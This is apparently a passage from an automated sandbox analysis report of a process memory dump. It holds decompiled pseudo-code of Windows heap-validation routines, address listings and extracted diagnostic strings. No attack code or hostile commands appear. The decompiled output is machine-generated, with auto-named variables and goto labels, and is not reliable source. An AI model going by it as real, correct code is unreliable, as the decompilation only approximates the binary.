												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E015DE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E015DA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E015DA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E015DBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E016623E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E015B1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                  0x01674af7
                                                  0x01674afb
                                                  0x01674afd
                                                  0x01674b01
                                                  0x01674b03
                                                  0x01674b08
                                                  0x01674b0a
                                                  0x01674b0f
                                                  0x01674eb5
                                                  0x01674eb5
                                                  0x01674ebb
                                                  0x016750d5
                                                  0x016750d8
                                                  0x01674ff6
                                                  0x00000000
                                                  0x01674ff6
                                                  0x016750de
                                                  0x016750e4
                                                  0x016750e8
                                                  0x01675107
                                                  0x0167510c
                                                  0x016750ea
                                                  0x016750ff
                                                  0x01675104
                                                  0x01675112
                                                  0x01675115
                                                  0x01675118
                                                  0x01675119
                                                  0x016750cb
                                                  0x016750cb
                                                  0x016750af
                                                  0x00000000
                                                  0x016750af
                                                  0x01674ecb
                                                  0x016750b6
                                                  0x016750bb
                                                  0x01674ed1
                                                  0x01674ee6
                                                  0x01674eeb
                                                  0x016750c1
                                                  0x016750c2
                                                  0x016750c5
                                                  0x016750c6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01674b15
                                                  0x01674b15
                                                  0x01674b1c
                                                  0x01674b1e
                                                  0x01674b23
                                                  0x01674b27
                                                  0x01674b33
                                                  0x01674b38
                                                  0x01674b3a
                                                  0x01674b3c
                                                  0x01674b41
                                                  0x01674b41
                                                  0x01674b3a
                                                  0x01674b52
                                                  0x01675045
                                                  0x0167504b
                                                  0x0167504f
                                                  0x0167506e
                                                  0x01675073
                                                  0x01675051
                                                  0x01675066
                                                  0x0167506b
                                                  0x01675083
                                                  0x01675088
                                                  0x01675088
                                                  0x0167508a
                                                  0x01675091
                                                  0x01675099
                                                  0x01675099
                                                  0x0167509d
                                                  0x016750a7
                                                  0x016750ad
                                                  0x016750ad
                                                  0x016750ad
                                                  0x00000000
                                                  0x0167509d
                                                  0x01674b58
                                                  0x01674b5b
                                                  0x01674b5e
                                                  0x01674b63
                                                  0x01674b66
                                                  0x01674b69
                                                  0x01674b6f
                                                  0x01674be4
                                                  0x01674bf0
                                                  0x01674bf2
                                                  0x01674bf5
                                                  0x01674dc3
                                                  0x01674dc6
                                                  0x01674dc9
                                                  0x01674dce
                                                  0x01674dce
                                                  0x01674dd0
                                                  0x01674dd0
                                                  0x01674dd5
                                                  0x01674def
                                                  0x01674dd7
                                                  0x01674de7
                                                  0x01674de7
                                                  0x01674df3
                                                  0x01675001
                                                  0x01675007
                                                  0x0167500b
                                                  0x0167502a
                                                  0x0167502f
                                                  0x0167500d
                                                  0x01675022
                                                  0x01675027
                                                  0x01675039
                                                  0x0167503a
                                                  0x0167503b
                                                  0x00000000
                                                  0x01674df9
                                                  0x01674dfd
                                                  0x01674e90
                                                  0x01674e94
                                                  0x01674e9e
                                                  0x01674ea4
                                                  0x01674ea4
                                                  0x01674ea4
                                                  0x01674ea6
                                                  0x01674ea6
                                                  0x00000000
                                                  0x01674ea6
                                                  0x01674e03
                                                  0x01674e08
                                                  0x01674f88
                                                  0x01674f92
                                                  0x01674f99
                                                  0x01674f9c
                                                  0x01674fe0
                                                  0x01674fe4
                                                  0x01674fee
                                                  0x01674ff4
                                                  0x01674ff4
                                                  0x01674ff4
                                                  0x00000000
                                                  0x01674fe4
                                                  0x01674f9e
                                                  0x01674fa4
                                                  0x01674fa8
                                                  0x01674fc7
                                                  0x01674fcc
                                                  0x01674faa
                                                  0x01674fbf
                                                  0x01674fc4
                                                  0x01674fd2
                                                  0x01674fd5
                                                  0x01674fd6
                                                  0x01674f34
                                                  0x01674f34
                                                  0x00000000
                                                  0x01674f39
                                                  0x01674e0e
                                                  0x01674e14
                                                  0x01674e1b
                                                  0x01674e25
                                                  0x01674e2b
                                                  0x01674e2b
                                                  0x01674e33
                                                  0x01674e38
                                                  0x01674e8a
                                                  0x01674e8a
                                                  0x00000000
                                                  0x01674e3a
                                                  0x01674e3e
                                                  0x01674e43
                                                  0x01674e47
                                                  0x01674e53
                                                  0x01674e58
                                                  0x01674e5a
                                                  0x01674e5c
                                                  0x01674e61
                                                  0x01674e61
                                                  0x01674e5a
                                                  0x01674e6e
                                                  0x01674f41
                                                  0x01674f47
                                                  0x01674f4b
                                                  0x01674f6a
                                                  0x01674f6f
                                                  0x01674f4d
                                                  0x01674f62
                                                  0x01674f67
                                                  0x01674f7f
                                                  0x01674f80
                                                  0x01674f81
                                                  0x00000000
                                                  0x01674e74
                                                  0x01674e78
                                                  0x01674e82
                                                  0x01674e88
                                                  0x01674e88
                                                  0x00000000
                                                  0x01674e78
                                                  0x01674e6e
                                                  0x01674e38
                                                  0x01674df3
                                                  0x01674bfe
                                                  0x01674c01
                                                  0x01674c04
                                                  0x01674c07
                                                  0x01674c09
                                                  0x01674c0c
                                                  0x01674c0e
                                                  0x01674c0e
                                                  0x01674c11
                                                  0x01674c11
                                                  0x01674c0c
                                                  0x01674c14
                                                  0x01674c17
                                                  0x01674dae
                                                  0x01674db2
                                                  0x01674db7
                                                  0x01674dba
                                                  0x01674dbd
                                                  0x01674ef1
                                                  0x01674ef7
                                                  0x01674efb
                                                  0x01674f1a
                                                  0x01674f1f
                                                  0x01674efd
                                                  0x01674f12
                                                  0x01674f17
                                                  0x01674f2b
                                                  0x01674f2b
                                                  0x01674f2d
                                                  0x01674f2e
                                                  0x01674f2f
                                                  0x00000000
                                                  0x01674f2f
                                                  0x00000000
                                                  0x01674c1d
                                                  0x01674c1d
                                                  0x01674c20
                                                  0x01674c23
                                                  0x01674c26
                                                  0x01674c29
                                                  0x01674c2c
                                                  0x01674c2e
                                                  0x01674d91
                                                  0x01674d91
                                                  0x01674d92
                                                  0x01674d97
                                                  0x01674d9e
                                                  0x00000000
                                                  0x01674d9e
                                                  0x01674c34
                                                  0x01674c37
                                                  0x01674c39
                                                  0x01674c3c
                                                  0x00000000
                                                  0x00000000
                                                  0x01674c45
                                                  0x01674c48
                                                  0x01674c4e
                                                  0x01674c50
                                                  0x01674c78
                                                  0x01674c78
                                                  0x01674c7b
                                                  0x01674c7d
                                                  0x01674c80
                                                  0x01674c84
                                                  0x01674cad
                                                  0x01674cad
                                                  0x01674cb0
                                                  0x01674cb8
                                                  0x01674cbb
                                                  0x01674cbe
                                                  0x01674cc1
                                                  0x01674cc7
                                                  0x01674cdc
                                                  0x01674cc9
                                                  0x01674cd2
                                                  0x01674cd4
                                                  0x01674cd4
                                                  0x01674cde
                                                  0x01674ce0
                                                  0x01674d13
                                                  0x01674d13
                                                  0x01674d16
                                                  0x01674d18
                                                  0x01674d29
                                                  0x01674d2a
                                                  0x01674d2c
                                                  0x01674d34
                                                  0x01674d1a
                                                  0x01674d1a
                                                  0x01674d1a
                                                  0x01674d1d
                                                  0x01674d1f
                                                  0x01674d22
                                                  0x01674d24
                                                  0x01674d24
                                                  0x01674d3c
                                                  0x01674d3f
                                                  0x01674d45
                                                  0x01674d47
                                                  0x01674d6c
                                                  0x01674d6c
                                                  0x01674d70
                                                  0x01674d7e
                                                  0x01674d84
                                                  0x01674d84
                                                  0x00000000
                                                  0x01674d49
                                                  0x01674d49
                                                  0x01674d56
                                                  0x01674d56
                                                  0x01674d59
                                                  0x00000000
                                                  0x00000000
                                                  0x01674d4e
                                                  0x01674d50
                                                  0x01674d52
                                                  0x01674d8e
                                                  0x01674d5d
                                                  0x01674d5f
                                                  0x01674d67
                                                  0x00000000
                                                  0x01674d67
                                                  0x01674d54
                                                  0x01674d54
                                                  0x01674d5b
                                                  0x00000000
                                                  0x01674d5b
                                                  0x01674ce2
                                                  0x01674ce2
                                                  0x01674ce5
                                                  0x01674ce5
                                                  0x01674ce7
                                                  0x01674cfb
                                                  0x01674ce9
                                                  0x01674ce9
                                                  0x01674cec
                                                  0x01674cef
                                                  0x01674cf1
                                                  0x01674cf3
                                                  0x01674cf3
                                                  0x01674cf3
                                                  0x01674cf6
                                                  0x01674cf6
                                                  0x01674d02
                                                  0x01674d05
                                                  0x00000000
                                                  0x00000000
                                                  0x01674d07
                                                  0x01674d0f
                                                  0x01674d11
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01674d11
                                                  0x00000000
                                                  0x01674ce5
                                                  0x01674ce0
                                                  0x01674c8a
                                                  0x01674c8f
                                                  0x01674c91
                                                  0x00000000
                                                  0x00000000
                                                  0x01674c9d
                                                  0x00000000
                                                  0x01674c9d
                                                  0x01674c52
                                                  0x01674c5f
                                                  0x01674c5f
                                                  0x01674c62
                                                  0x00000000
                                                  0x00000000
                                                  0x01674c57
                                                  0x01674c59
                                                  0x01674c5b
                                                  0x01674caa
                                                  0x01674c66
                                                  0x01674c68
                                                  0x01674c70
                                                  0x01674c75
                                                  0x00000000
                                                  0x01674c75
                                                  0x01674c5d
                                                  0x01674c5d
                                                  0x01674c64
                                                  0x00000000
                                                  0x01674c64
                                                  0x01674c17
                                                  0x01674b75
                                                  0x01674bc4
                                                  0x01674bc8
                                                  0x00000000
                                                  0x00000000
                                                  0x01674bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01674b77
                                                  0x01674b7a
                                                  0x01674b8c
                                                  0x01674b7c
                                                  0x01674b7e
                                                  0x01674b83
                                                  0x01674b86
                                                  0x01674b86
                                                  0x01674b90
                                                  0x01674b93
                                                  0x00000000
                                                  0x00000000
                                                  0x01674b95
                                                  0x01674bab
                                                  0x01674bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x01674bb2
                                                  0x01674bb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01674bbb
                                                  0x01674bbe
                                                  0x01674bc1
                                                  0x01674bc1
                                                  0x00000000
                                                  0x01674bc1
                                                  0x01674b97
                                                  0x01674ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x01674ba6
                                                  0x00000000
                                                  0x01674ba6
                                                  0x01674ea9
                                                  0x01674ea9
                                                  0x01674eb2
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                  • API String ID: 0-3591852110
                                                  • Opcode ID: 1ed3765da61adfccf78b9912848d55535c827dca602c4595c5df482e11cfcb30
                                                  • Instruction ID: dbe1deca3e8f371e2b4aebef48e1e9d5ab0f17841c5d0f478927654a7b9d30da
                                                  • Opcode Fuzzy Hash: 1ed3765da61adfccf78b9912848d55535c827dca602c4595c5df482e11cfcb30
                                                  • Instruction Fuzzy Hash: 2312BD30200642DFDB25CF69C899BBABBF5FF48710F148459E4868B741DB78E981CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01674496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 56%
                                                  			E01674496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E016749A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x16a6378 = _t267;
						asm("int3");
						 *0x16a6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E015E174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E015BB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E015BB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x16a6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E015F9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E015E174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E015BB150();
										} else {
											E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E015BB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E015BB150();
									} else {
										E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E015BB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E015BB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01674AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0166FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016623E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                  0x016744a1
                                                  0x016744a3
                                                  0x016744a7
                                                  0x016744ac
                                                  0x016744af
                                                  0x016744b2
                                                  0x016744b9
                                                  0x016744bc
                                                  0x016747f2
                                                  0x016747f2
                                                  0x016747f8
                                                  0x016747fc
                                                  0x016747fe
                                                  0x01674804
                                                  0x01674805
                                                  0x01674805
                                                  0x0167480c
                                                  0x01674810
                                                  0x01674812
                                                  0x01674812
                                                  0x01674812
                                                  0x01674822
                                                  0x01674822
                                                  0x01674827
                                                  0x01674827
                                                  0x00000000
                                                  0x01674827
                                                  0x016744c4
                                                  0x016744d3
                                                  0x016744d9
                                                  0x016744dc
                                                  0x016744de
                                                  0x016744e0
                                                  0x01674560
                                                  0x01674520
                                                  0x01674522
                                                  0x01674525
                                                  0x01674528
                                                  0x0167452b
                                                  0x0167452e
                                                  0x01674530
                                                  0x01674697
                                                  0x0167469d
                                                  0x016746a1
                                                  0x016746c0
                                                  0x016746c5
                                                  0x016746a3
                                                  0x016746b8
                                                  0x016746bd
                                                  0x016746cb
                                                  0x016746d4
                                                  0x01674677
                                                  0x01674677
                                                  0x01674679
                                                  0x0167467c
                                                  0x0167468a
                                                  0x01674690
                                                  0x01674690
                                                  0x016747f1
                                                  0x016747f1
                                                  0x016747f1
                                                  0x00000000
                                                  0x016747f1
                                                  0x01674536
                                                  0x01674539
                                                  0x0167453c
                                                  0x01674636
                                                  0x0167463c
                                                  0x01674640
                                                  0x0167465f
                                                  0x01674664
                                                  0x01674642
                                                  0x01674657
                                                  0x0167465c
                                                  0x01674670
                                                  0x00000000
                                                  0x01674542
                                                  0x01674542
                                                  0x01674546
                                                  0x01674548
                                                  0x0167454b
                                                  0x01674555
                                                  0x0167455b
                                                  0x0167455b
                                                  0x0167455b
                                                  0x0167455d
                                                  0x0167455d
                                                  0x0167455d
                                                  0x00000000
                                                  0x0167455d
                                                  0x0167453c
                                                  0x01674579
                                                  0x0167457c
                                                  0x01674587
                                                  0x01674589
                                                  0x01674591
                                                  0x01674592
                                                  0x01674597
                                                  0x01674598
                                                  0x016745a1
                                                  0x016745ab
                                                  0x016745ab
                                                  0x016745a1
                                                  0x016745ae
                                                  0x016745b4
                                                  0x016745b9
                                                  0x016745bd
                                                  0x01674759
                                                  0x01674759
                                                  0x0167475f
                                                  0x01674761
                                                  0x01674763
                                                  0x01674765
                                                  0x01674768
                                                  0x0167476b
                                                  0x0167476d
                                                  0x0167479c
                                                  0x0167479c
                                                  0x0167479f
                                                  0x016747a2
                                                  0x016747a4
                                                  0x01674830
                                                  0x01674833
                                                  0x01674879
                                                  0x0167487d
                                                  0x016748f1
                                                  0x016748f3
                                                  0x016748f3
                                                  0x00000000
                                                  0x016748f3
                                                  0x0167487f
                                                  0x01674885
                                                  0x01674887
                                                  0x016748a8
                                                  0x016748a8
                                                  0x016748ae
                                                  0x016748b0
                                                  0x016748dc
                                                  0x016748dc
                                                  0x016748dc
                                                  0x016748dc
                                                  0x016748ec
                                                  0x00000000
                                                  0x016748ec
                                                  0x016748b2
                                                  0x016748bc
                                                  0x016748be
                                                  0x016748c1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016748c3
                                                  0x016748c3
                                                  0x016748c6
                                                  0x016748c9
                                                  0x016748cc
                                                  0x016748d1
                                                  0x016748d4
                                                  0x00000000
                                                  0x00000000
                                                  0x016748d6
                                                  0x016748d7
                                                  0x016748da
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016748da
                                                  0x0167494f
                                                  0x01674955
                                                  0x01674959
                                                  0x01674978
                                                  0x0167497d
                                                  0x0167495b
                                                  0x01674970
                                                  0x01674975
                                                  0x01674986
                                                  0x01674987
                                                  0x0167498a
                                                  0x0167498d
                                                  0x01674997
                                                  0x016747ef
                                                  0x016747ef
                                                  0x016747ef
                                                  0x00000000
                                                  0x016747ef
                                                  0x01674890
                                                  0x01674890
                                                  0x01674891
                                                  0x01674891
                                                  0x01674894
                                                  0x01674897
                                                  0x0167489d
                                                  0x016748a0
                                                  0x00000000
                                                  0x00000000
                                                  0x016748a2
                                                  0x016748a3
                                                  0x016748a6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016748a6
                                                  0x016748fb
                                                  0x01674901
                                                  0x01674905
                                                  0x01674924
                                                  0x01674929
                                                  0x01674907
                                                  0x0167491c
                                                  0x01674921
                                                  0x0167492f
                                                  0x01674935
                                                  0x01674936
                                                  0x01674939
                                                  0x01674942
                                                  0x00000000
                                                  0x01674947
